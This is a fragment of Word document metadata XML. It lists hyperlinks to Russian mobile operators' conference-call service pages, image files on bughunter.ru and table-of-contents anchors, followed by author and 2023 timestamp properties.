      </vt:variant>
      <vt:variant>
        <vt:i4>120</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://spb.tele2.ru/services/udobnoe-obshenie/konferenc-svyaz/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1638403</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>117</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://moskva.beeline.ru/customers/products/mobile/services/details/konferents-svyaz/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5767182</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>114</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://moscow.megafon.ru/services/base/service42.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>111</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.mts.ru/mob_connect/services/direction_calls/other_services/conference_call/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>108</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_16.jpg</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274526</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>105</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_15.jpg</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274527</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>102</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_14.jpg</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274520</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>99</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_13.jpg</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359301</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808637</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359301</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808635</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359301</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808634</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424837</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808628</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424837</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808626</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808619</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808618</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808617</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808616</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808615</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808614</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808613</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808612</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808611</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808610</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2555909</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc3808609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Леонид</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-12T11:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-12T11:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>